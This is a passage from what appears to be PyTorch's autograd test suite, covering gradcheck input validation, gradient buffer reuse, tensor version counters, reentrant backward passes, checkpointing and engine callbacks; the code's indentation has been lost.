A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
